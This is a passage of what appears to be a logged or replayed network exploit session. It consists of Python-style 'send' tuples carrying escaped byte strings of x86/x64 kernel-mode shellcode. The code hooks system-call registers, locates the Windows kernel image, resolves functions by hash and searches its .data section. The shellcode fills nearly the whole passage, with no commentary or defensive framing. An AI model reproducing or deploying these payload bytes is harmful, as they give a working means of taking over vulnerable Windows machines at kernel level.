\\x01\\\\x00\\\\x00\\\\xe8\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xe3\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bK\\\\xd8\\\\xe8\\\\x17\\\\x01\\\\x00\\\\x00<#t\\\\r<wt\\\\x1c<\\\\xc8t\"\\\\xe9\\\\xb6\\\\x00\\\\x00\\\\x00\\\\x8bM8\\\\x8bE$\\\\x89A\\\\x0e1\\\\xc0\\\\x88A\\\\x12\\\\xe9\\\\x9f\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x13\\\\x01\\\\x00\\\\x00\\\\xe9\\\\xb5\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bC\\\\xe8\\\\x8b03u(\\\\x8bx\\\\x083}(\\\\x8b@\\\\x043E(;C\\\\x10\\\\x89\\\\xc3u{\\\\x8bM09\\\\xf1\\\\x8bE,t\\\\x18\\\\xe8\\\\xf2\\\\x00\\\\x00\\\\x00\\\\x8dF\\\\x04Pj\\\\x00\\\\xffU\\\\x08\\\\x85\\\\xc0tc\\\\x89E,\\\\x89u0\\\\x01\\\\xdf9\\\\xf7wS)\\\\xdf\\\\x01\\\\xc7W\\\\x89\\\\xf2\\\\x8bu<\\\\x8bv\\\\xf0\\\\x89\\\\xd9\\\\xf3\\\\xa4^\\\\x89\\\\xd9\\\\xc1\\\\xe9\\\\x02\\\\x8b](1\\\\x1e\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf9\\\\x01\\\\xd09\\\\xc6|(\\\\x8bE,`\\\\x89\\\\xe6P\\\\xff\\\\xd0\\\\x89\\\\xf4a\\\\xe8\\\\xa1\\\\x00\\\\x00\\\\x00\\\\x8bE$\\\\xd1\\\\xe81\\\\xc9\\\\x88\\\\xc1\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89E$\\\\xe8h\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00\\\\x8bM8\\\\xb4\\\\x00f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1ca\\\\xff`<\\\\x8dEH\\\\x8bM\\\\x0c\\\\x89\\\\x88G\\\\x01\\\\x00\\\\x00\\\\x89\\\\xa8>\\\\x01\\\\x00\\\\x00f\\\\xb8\\\\x10\\\\x00\\\\x8bM8f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1cah\\\\x00\\\\x00\\\\x00\\\\x00\\\\x8b@<Ph\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc31\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bE$\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89E(Y\\\\xc3`\\\\xe8\\\\x0b\\\\x00\\\\x00\\\\x00\\\\x8bE\\\\x10\\\\x8bH<\\\\x89H8a\\\\xc3`\\\\x8b],\\\\x85\\\\xdbt\\\\r1\\\\xc0\\\\x89\\\\xdf\\\\x8bM0\\\\xf3\\\\xaaS\\\\xffU\\\\x0c1\\\\xc0\\\\x89E0\\\\x89E,a\\\\xc3WRV\\\\x89\\\\xcf\\\\x8bUD\\\\x8b\\\\n\\\\xe89\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0u\\\\x0e\\\\x83\\\\xc2\\\\x08\\\\x8b\\\\n\\\\xe8+\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t!\\\\x89MDj\\\\x0cX\\\\x8dqT;\\\\x06t\\\\x07\\\\x83\\\\xc6\\\\x04;\\\\x06u\\\\r;F\\\\x04u\\\\x08\\\\x89u<1\\\\xc0@\\\\xeb\\\\x021\\\\xc0^Z_\\\\xc31\\\\xc09\\\\xc1}\\\\x01@\\\\xc3RQ1\\\\xd2f\\\\x8bQ\\\\x02\\\\x01\\\\xca;\\\\x11t\\\\x05\\\\x83\\\\xc1\\\\x04\\\\xeb\\\\xf7Z\\\\x8dA\\\\x1c\\\\x83\\\\xc0\\\\x07$\\\\xf8\\\\x89ED\\\\x8bA\\\\xf8\\\\x89E8\\\\x89\\\\xd1Z\\\\xc3SUWVATAUAVAWH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x80\\\\x00\\\\x00\\\\x00f\\\\x83\\\\xe4\\\\xf0\\\\xe8\\\\x83\\\\x03\\\\x00\\\\x00H\\\\x89E\\\\xf8H\\\\x89\\\\xc3\\\\xb9.[Q\\\\xd2\\\\xe8\\\\xee\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xd5\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc6\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8\\\\xd8\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xbf\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xf0H\\\\x89\\\\xc7\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe8\\\\xbe\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xa5\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xe8L\\\\x8dM\\\\xd0M1\\\\xc0L\\\\x89\\\\xc1D\\\\x89E\\\\xd0L\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6D\\\\x8bE\\\\xd0E\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0H1\\\\xc9\\\\xff\\\\xd7H\\\\x85\\\\xc0\\\\x0f\\\\x84n\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc3H1\\\\xc9I\\\\x89\\\\xc9D\\\\x8bE\\\\xd0H\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6H\\\\x85\\\\xc0\\\\x0f\\\\x85Q\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xd8H-\\\\xf8\\\\x00\\\\x00\\\\x00H\\\\x05(\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0\\\\x81\\\\xea(\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c3\\\\x01\\\\x00\\\\x00\\\\x89U\\\\xd0P\\\\xe8?\\\\x02\\\\x00\\\\x00H\\\\x89\\\\xc2X\\\\xb9\\\\xfa<\\\\xad\\\\xc2H9\\\\xcat\\\\n\\\\xb9\\\\x1a\\\\xbdK+H9\\\\xcau\\\\xcaH\\\\x8bp\\\\xe8H\\\\x89\\\\xd9\\\\xffU\\\\xe8H\\\\x89\\\\xf0H1\\\\xd2H\\\\x89\\\\xc3\\\\x8bP<H\\\\x01\\\\xd0H\\\\x89\\\\xc6H1\\\\xc9H\\\\x89\\\\xcaf\\\\x8bH\\\\x06f\\\\x8bP\\\\x14H\\\\x01\\\\xd6H\\\\x83\\\\xc6\\\\x18H\\\\xbf.data\\\\x00\\\\x00\\\\x00H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x84\\\\xcd\\\\x00\\\\x00\\\\x00H\\\\x8b\\\\x06H9\\\\xf8t\\\\tH\\\\x83\\\\xc6(H\\\\xff\\\\xc9\\\\xeb\\\\xe5\\\\x8bF\\\\x0c\\\\x8bN\\\\x08H\\\\x01\\\\xc6H\\\\xbb\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfeH\\\\x83\\\\xe9\\\\x08H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x8c\\\\x9b\\\\x00\\\\x00\\\\x00H\\\\x8b>H9\\\\xdfu\\\\x0cL\\\\x8b\\\\x86\\\\x98\\\\x00\\\\x00\\\\x00M\\\\x85\\\\xc0t\\\\x06H\\\\x83\\\\xc6\\\\x08\\\\xeb\\\\xd8H\\\\x83\\\\xc6\\\\x08H\\\\x89u\\\\xe0H1\\\\xc9\\\\xba\\\\xf0\\\\x0f\\\\x00\\\\x00\\\\xffU\\\\xf0H\\\\x85\\\\xc0tiI\\\\x89\\\\xc1H1\\\\xc0\\\\xb9\\\\x00\\\\x04\\\\x00\\\\x00L\\\\x89\\\\xcf\\\\xf3\\\\xabL\\\\x89\\\\xcfH\\\\x83\\\\xc7`H\\\\x8d5\\\\x91\\\\x02\\\\x00\\\\x00H1\\\\xc9f\\\\xb96\\\\x02\\\\xf3\\\\xa4M\\\\x89\\\\tH\\\\x8b]\\\\xf8I\\\\x89Y\\\\x08H1\\\\xdfH\\\\x8b]\\\\xf0I\\\\x89Y\\\\x10H1\\\\xdfH\\\\x8b]\\\\xe8I\\\\x89Y\\\\x18H1\\\\xdfH\\\\x8b]\\\\xe0I\\\\x89Y H1\\\\xdfA\\\\x89yDH\\\\x8bE\\\\xe0H\\\\x83\\\\xc0pI\\\\x83\\\\xc1`L\\\\x89\\\\x08H\\', 0.0)', '(\\'send\\', 13, b\\'\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x90\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\x01\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x001\\\\xc0@\\\\x90t\\\\x08\\\\xe8\\\\t\\\\x00\\\\x00\\\\x00\\\\xc2$\\\\x00\\\\xe8\\\\xa7\\\\x00\\\\x00\\\\x00\\\\xc3\\\\xe8\\\\x01\\\\x00\\\\x00\\\\x00\\\\xeb\\\\x90[\\\\xb9v\\\\x01\\\\x00\\\\x00\\\\x0f2\\\\xa3\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\x8dC\\\\x171\\\\xd2\\\\x0f0\\\\xc3\\\\xb9#\\\\x00\\\\x00\\\\x00j0\\\\x0f\\\\xa1\\\\x8e\\\\xd9\\\\x8e\\\\xc1d\\\\x8b\\\\r@\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\xff5\\\\xfc\\\\xff\\\\xdf\\\\xff`\\\\x9cj#R\\\\x9cj\\\\x02\\\\x83\\\\xc2\\\\x08\\\\x9d\\\\x80L$\\\\x01\\\\x02j\\\\x1b\\\\xff5\\\\x04\\\\x03\\\\xdf\\\\xffj\\\\x00USVWd\\\\x8b\\\\x1d\\\\x1c\\\\x00\\\\x00\\\\x00j;\\\\x8b\\\\xb3$\\\\x01\\\\x00\\\\x00\\\\xff31\\\\xc0H\\\\x89\\\\x03\\\\x8bn(j\\\\x01\\\\x83\\\\xecH\\\\x81\\\\xed\\\\x9c\\\\x02\\\\x00\\\\x00\\\\xa1\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\xb9v\\\\x01\\\\x00\\\\x001\\\\xd2\\\\x0f0\\\\xfb\\\\xe8\\\\x11\\\\x00\\\\x00\\\\x00\\\\xfad\\\\x8b\\\\r@\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\x83\\\\xec(\\\\x9da\\\\xc3\\\\xe9\\\\xef\\\\x00\\\\x00\\\\x00\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f2H\\\\xbb\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x89S\\\\x04\\\\x89\\\\x03H\\\\x8d\\\\x05\\\\n\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xc2H\\\\xc1\\\\xea \\\\x0f0\\\\xc3\\\\x0f\\\\x01\\\\xf8eH\\\\x89$%\\\\x10\\\\x00\\\\x00\\\\x00eH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00PSQRVWUAPAQARASATAUAVAWj+e\\\\xff4%\\\\x10\\\\x00\\\\x00\\\\x00ASj3QL\\\\x89\\\\xd1H\\\\x83\\\\xec\\\\x08UH\\\\x81\\\\xecX\\\\x01\\\\x00\\\\x00H\\\\x8d\\\\xac$\\\\x80\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x9d\\\\xc0\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xbd\\\\xc8\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xb5\\\\xd0\\\\x00\\\\x00\\\\x00H\\\\xa1\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xc2H\\\\xc1\\\\xea H1\\\\xdb\\\\xff\\\\xcbH!\\\\xd8H1\\\\xc9\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f0\\\\xfb\\\\xe88\\\\x00\\\\x00\\\\x00\\\\xfaeH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00H\\\\x83\\\\xecxA_A^A]A\\\\\\\\A[AZAYAX]_^ZY[XeH\\\\x8b$%\\\\x10\\\\x00\\\\x00\\\\x00\\\\x0f\\\\x01\\\\xf8\\\\xff$%\\\\xf8\\\\x0f\\\\xd0\\\\xff1\\\\xc0@\\\\x90\\\\x0f\\\\x84\\\\xb5\\\\x05\\\\x00\\\\x00\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00X`\\\\x89\\\\xc3\\\\x89\\\\xe5\\\\x83\\\\xecHd\\\\x8b\\\\r8\\\\x00\\\\x00\\\\x00f\\\\x8bA\\\\x06\\\\xc1\\\\xe0\\\\x10f\\\\x8b\\\\x01f%\\\\x00\\\\xf0\\\\x8b\\\\x08f\\\\x81\\\\xf9MZt\\\\x07-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xf0\\\\x89E\\\\xfcS\\\\x89\\\\xc3\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8>\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf8\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe81\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\xb9.[Q\\\\xd2\\\\xe8$\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xec[\\\\x8dU\\\\xe81\\\\xc9\\\\x89\\\\nRj\\\\x00Rj\\\\x0b\\\\xff\\\\xd0\\\\x8bU\\\\xe8\\\\x85\\\\xd2\\\\x0f\\\\x84\\\\x02\\\\x01\\\\x00\\\\x00Rj\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xf4\\\\x00\\\\x00\\\\x00Pj\\\\x00\\\\xffu\\\\xe8Pj\\\\x0b\\\\xffU\\\\xec\\\\x85\\\\xc0\\\\x0f\\\\x85\\\\xe0\\\\x00\\\\x00\\\\x00XP-\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x05\\\\x1c\\\\x01\\\\x00\\\\x00P\\\\xe8\\\\x80\\\\x01\\\\x00\\\\x00\\\\xb9\\\\xfa<\\\\xad\\\\xc29\\\\xc8t\\\\x1e\\\\xb9\\\\x1a\\\\xbdK+9\\\\xc8t\\\\x15X\\\\x8bU\\\\xe8\\\\x81\\\\xea\\\\x1c\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c\\\\xac\\\\x00\\\\x00\\\\x00\\\\x89U\\\\xe8\\\\xeb\\\\xceX\\\\x8bp\\\\xec\\\\xffU\\\\xf4\\\\x89\\\\xf0PPh.datja\\\\xe8\\\\\\'\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x88\\\\x00\\\\x00\\\\x00X\\\\x83\\\\xe9@\\\\xe8Z\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x15\\\\x8b\\\\x16\\\\xc1\\\\xea\\\\x18\\\\x89\\\\xf0\\\\xc1\\\\xe8\\\\x189\\\\xd0u\\\\x07\\\\x8bFH\\\\x85\\\\xc0t\\\\n\\\\x83\\\\xc6\\\\x04\\\\x83\\\\xe9\\\\x04\\\\xe3^\\\\xeb\\\\xd8\\\\x89u\\\\xf0Vh\\\\xf8\\\\x0f\\\\x00\\\\x00j\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0tJP\\\\x89\\\\xc71\\\\xc0\\\\x89\\\\xc1f\\\\x81\\\\xc1\\\\x00\\\\x04\\\\xf3\\\\xabX\\\\x89\\\\x00\\\\x8bU\\\\x04\\\\x89P\\\\x041\\\\xd7\\\\x8bU\\\\xf8\\\\x89P\\\\x081\\\\xd7\\\\x8bU\\\\xf4\\\\x89P\\\\x0c1\\\\xd7\\\\x8bU\\\\xf0\\\\x89P\\\\x101\\\\xd7\\\\x89x$\\\\x83\\\\xc0H\\\\x89\\\\xc7\\\\x8d\\\\xb3\\\\x96\\\\x03\\\\x00\\\\x00\\\\xb9\\\\x1a\\\\x02\\\\x00\\\\x00\\\\xf3\\\\xa4[\\\\x89C8\\\\x89\\\\xeca\\\\xc3SRQWU\\\\x89\\\\xe5\\\\x83\\\\xec\\\\x18\\\\x89\\\\xcf\\\\x89\\\\xd8\\\\x89E\\\\xfc\\\\xe8z\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0tm\\\\x89E\\\\xf8\\\\xe8\\\\xee\\\\x00\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x0e\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tS\\\\x89E\\\\xf0\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x04\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tA\\\\x89E\\\\xec\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\xfa\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t/\\\\x89E\\\\xe8\\\\x8bE\\\\xfc\\\\x89\\\\xf9\\\\x8bU\\\\xec\\\\x8b]\\\\xf4\\\\xe8\\\\xab\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x18\\\\x89\\\\xc1\\\\x8bE\\\\xe8\\\\xe8\\\\xdd\\\\x00\\\\x00\\\\x00f\\\\x89\\\\xc2\\\\x8bE\\\\xfc\\\\x8bM\\\\xf0\\\\xe8\\\\xd7\\\\x00\\\\x00\\\\x00\\\\x83\\\\xc4\\\\x18]_YZ[\\\\xc3V\\\\x89\\\\xc6\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc6f\\\\x81>PEu\\\\t\\\\x83\\\\xc6x\\\\x8b6\\\\x01\\\\xf0^\\\\xc31\\\\xc0\\\\xeb\\\\xfaVQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x05\\\\x01\\\\xc8F\\\\xeb\\\\xe9_Y^\\\\xc3VWR\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0F\\\\xe2\\\\xeeZ_^\\\\xc3VQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\xc6\\\\x01\\\\xc8FF\\\\xeb\\\\xe8_Y^\\\\xc3\\\\x83\\\\xc0\\\\x18\\\\x8b\\\\x00\\\\xc3WVQ1\\\\xff\\\\x89\\\\xc69\\\\xdft\\\\x19\\\\x8b\\\\x04\\\\xba\\\\x01\\\\xf0\\\\xe8\\\\x83\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x07G\\\\xeb\\\\xebY^_\\\\xc3\\\\x89\\\\xf8\\\\xeb\\\\xf81\\\\xc0\\\\xeb\\\\xf4\\\\x83\\\\xc1\\\\x1c\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1 \\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1$\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\xd1\\\\xe1\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3\\\\x81\\\\xe2\\\\xff\\\\xff\\\\x00\\\\x00\\\\xc1\\\\xe2\\\\x02\\\\x01\\\\xd1\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3RV\\\\x8bt$\\\\x0c\\\\x8bL$\\\\x101\\\\xd2\\\\xd1\\\\xe9\\\\x85\\\\xc9t\\\\x0c\\\\xc1\\\\xc2\\\\x05\\\\xacF\\\\x0c 0\\\\xc2I\\\\xeb\\\\xf0\\\\x89\\\\xd0^Z\\\\xc2\\\\x08\\\\x00XZ_^PV\\\\x89\\\\xf0\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc61\\\\xc0\\\\x89\\\\xc1f\\\\x8bN\\\\x06f\\\\x8bF\\\\x14\\\\x01\\\\xc6\\\\x83\\\\xc6\\\\x18\\\\x85\\\\xc9t\\\\x1d\\\\x8b\\\\x069\\\\xf8u\\\\x07\\\\x8bF\\\\x049\\\\xd0t\\\\x06\\\\x83\\\\xc6(I\\\\xeb\\\\xe9\\\\x8bF\\\\x0c\\\\x8bN\\\\x08^\\\\x01\\\\xc6\\\\xc31\\\\xf6\\\\xc3`1\\\\xc0\\\\x83\\\\xf8\\\\x0ft\\\\x1e1\\\\xc9\\\\x8b<\\\\x86\\\\x8b\\\\x14\\\\x8e9\\\\xd7t\\\\x03Au\\\\xf3\\\\x0f\\\\xb6\\\\x94\\\\x03\\\\x87\\\\x03\\\\x00\\\\x009\\\\xd1u\\\\r@\\\\xeb\\\\xddA9\\\\xc8u\\\\x05a1\\\\xc0@\\\\xc3a1\\\\xc0\\\\xc3\\\\x00\\\\x01\\\\x02\\\\x03\\\\x04\\\\x05\\\\x06\\\\x07\\\\x08\\\\t\\\\n\\\\t\\\\t\\\\r\\\\x0e\\\\x8bL$\\\\x08`\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00]f\\\\x81\\\\xe5\\\\x00\\\\xf0\\\\x89M4\\\\xe8\\\\xd9\\\\x01\\\\x00\\\\x00\\\\xe8C\\\\x01\\\\x00\\\\x00\\\\xe8\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xe3\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bK\\\\xd8\\\\xe8\\\\x17\\\\x01\\\\x00\\\\x00<#t\\\\r<wt\\\\x1c<\\\\xc8t\"\\\\xe9\\\\xb6\\\\x00\\\\x00\\\\x00\\\\x8bM8\\\\x8bE$\\\\x89A\\\\x0e1\\\\xc0\\\\x88A\\\\x12\\\\xe9\\\\x9f\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x13\\\\x01\\\\x00\\\\x00\\\\xe9\\\\xb5\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bC\\\\xe8\\\\x8b03u(\\\\x8bx\\\\x083}(\\\\x8b@\\\\x043E(;C\\\\x10\\\\x89\\\\xc3u{\\\\x8bM09\\\\xf1\\\\x8bE,t\\\\x18\\\\xe8\\\\xf2\\\\x00\\\\x00\\\\x00\\\\x8dF\\\\x04Pj\\\\x00\\\\xffU\\\\x08\\\\x85\\\\xc0tc\\\\x89E,\\\\x89u0\\\\x01\\\\xdf9\\\\xf7wS)\\\\xdf\\\\x01\\\\xc7W\\\\x89\\\\xf2\\\\x8bu<\\\\x8bv\\\\xf0\\\\x89\\\\xd9\\\\xf3\\\\xa4^\\\\x89\\\\xd9\\\\xc1\\\\xe9\\\\x02\\\\x8b](1\\\\x1e\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf9\\\\x01\\\\xd09\\\\xc6|(\\\\x8b